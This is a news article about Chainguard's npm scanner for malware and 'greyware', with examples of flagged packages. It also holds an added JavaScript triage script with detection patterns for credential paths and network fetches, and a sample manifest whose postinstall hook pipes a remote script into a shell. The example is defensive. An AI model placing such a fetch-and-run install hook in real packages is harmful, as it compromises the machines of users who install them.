Chainguard launches scanner to block npm malware, greyware
Chainguard has launched a source code scanner that blocks open source packages it classifies as malware and “greyware”. It says the tool is already screening more than 100,000 packages a day.
The scanner is available for npm packages requested through Chainguard Libraries for JavaScript and has already blocked more than 52,000 packages identified as malware or greyware.
Chainguard uses the term greyware for open source packages that disclose their intended behaviour but still pose security risks many organisations would reject in a formal review. These can include tools for credential harvesting, command interception, persistent remote access and account fraud automation.
The launch reflects broader concern in software security over the growth of risky dependencies in public registries. Security teams have long focused on malware hidden inside code packages, but Chainguard argues that another category is slipping through because the software openly states what it does and can avoid conventional malware detection.
In its current setup, the scanner reviews packages before they are added to the Chainguard Libraries catalogue rather than waiting until a customer requests them. It examines maintainer behaviour, package contents, publishing signals and the behaviour of installation scripts in a sandboxed environment.
That includes unusual account activity, changes in release history, obfuscated code, suspicious domains, differences between source code and published packages, and scripts that try to contact external servers or access local files. Packages are then marked as malicious, escalated for review by a security engineer, or cleared for use.
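To make the install-script signal and the three outcomes concrete, here is an added example (not Chainguard's code or rules) that statically triages the install lifecycle hooks in an npm manifest and also applies a cooldown check. The rule patterns, verdict names, function name and sample manifests are assumptions constructed for illustration; a real scanner would also execute the scripts in a sandbox, which this does not do.

```javascript
// Added example: static triage of npm install hooks. Rules are illustrative assumptions.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
const RULES = [
  { signal: "network-fetch", re: /\b(curl|wget)\b|https?:\/\//i },
  { signal: "pipe-to-shell", re: /\|\s*(sh|bash)\b/ },
  { signal: "inline-eval", re: /\bnode\s+(-e|--eval)\b/ },
  { signal: "sensitive-path", re: /\.ssh\b|\.npmrc\b|\.aws\b/ },
];
const DAY_MS = 24 * 60 * 60 * 1000;

// manifest: parsed package.json; publishedAt / now: epoch milliseconds.
function triageManifest(manifest, publishedAt, now, cooldownDays = 7) {
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = (manifest.scripts || {})[hook];
    if (typeof cmd !== "string") continue; // hook absent or malformed
    for (const { signal, re } of RULES) {
      if (re.test(cmd)) findings.push({ hook, signal });
    }
  }
  const signals = new Set(findings.map((f) => f.signal));
  const inCooldown = (now - publishedAt) / DAY_MS < cooldownDays;

  // Package age never clears a finding: an old package with a risky hook
  // is still escalated, so the cooldown is only one input among several.
  let verdict = "cleared";
  if (signals.has("network-fetch") &&
      (signals.has("pipe-to-shell") || signals.has("sensitive-path"))) {
    verdict = "malicious";
  } else if (findings.length > 0 || inCooldown) {
    verdict = "review";
  }
  return { verdict, inCooldown, findings };
}

// Constructed sample manifests (not real packages).
const SAMPLES = {
  fetchAndRun: { name: "example-a",
    scripts: { postinstall: "curl -s https://example.invalid/i.sh | sh" } },
  evalHook: { name: "example-b",
    scripts: { preinstall: "node -e \"require('./setup')\"" } },
  plain: { name: "example-c", scripts: { test: "node test.js" } },
};
```

The second sample shows why a cooldown alone is not enough: published 30 days ago, it is past the seven-day window yet still goes to review because of its preinstall hook.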
Chainguard says the volume of software being generated and adopted through AI-assisted development is making manual dependency checks less realistic. It argues that developers often rely on indicators such as download numbers, repository activity or autocomplete suggestions rather than reading package documentation or reviewing source code in detail.
The company also pointed to a wider industry backdrop in which supply chain attacks remain a significant issue, citing figures showing that 65% of organisations said they experienced a supply chain attack in the past year.
Examples found
Among the examples identified on npm was leobot-cli, which Chainguard described as an account fraud automation tool. The package advertises itself as a command-line bot for registering Canva and Leonardo accounts and includes a command to generate fake accounts and inject a Chrome extension for session injection and token monitoring.
Another package, @robinpath/cloud-cli, was described as software that creates a permanent backdoor from a machine to a third-party server and waits for commands to run. It is presented as a command-line tool for an AI assistant that reads code, creates files, executes commands and builds scripts.
Chainguard also highlighted noesis-miner, which it said reads Solana keypairs from disk and runs persistent mining loops. The package is presented as an AI-agent-mined token protocol for Solana.
It identified drogonclaw as a hacking toolkit that includes open source intelligence functions, network scanning, exploit execution and remote mobile control. The package advertises itself as an autonomous AI pentest framework.
A fifth example, chrome-tool, was described as a Chrome credential-harvesting extension. According to Chainguard, the package exports modules designed to extract passwords, cookies, credit card information and autofill data.
Several of these packages remain available for download on npm and have each recorded thousands of downloads, Chainguard said. Some had also passed what it described as a typical seven-day cooldown period, a delay often used by software security products before treating a package as established.
Scanner design
The scanner sits inside Chainguard Repository and is intended to add another layer of review on top of existing checks such as building from source and cooldown periods. The aim is to reduce the risk of malicious or risky software being cached inside internal systems before it is flagged.
Ross Gordon, Staff Product Marketing Manager, and Evan Gibler, Staff Security Engineer at Chainguard, described the rationale for the product in a joint comment: “Malware has become a serious industry problem: 65% of organizations said they experienced a supply chain attack last year, let alone in 2026. However, there hasn’t been much emphasis on packages that do exactly what their README says, pass malware scans, but act in ways no CISO would ever approve. We call those packages greyware.”
Protection is currently in place for npm packages requested through Chainguard’s JavaScript library service, with additional language ecosystems due to be added later. Chainguard says the scanner is already protecting all packages served through its upstream fallback to npm and has blocked more than 52,000 malware and greyware packages.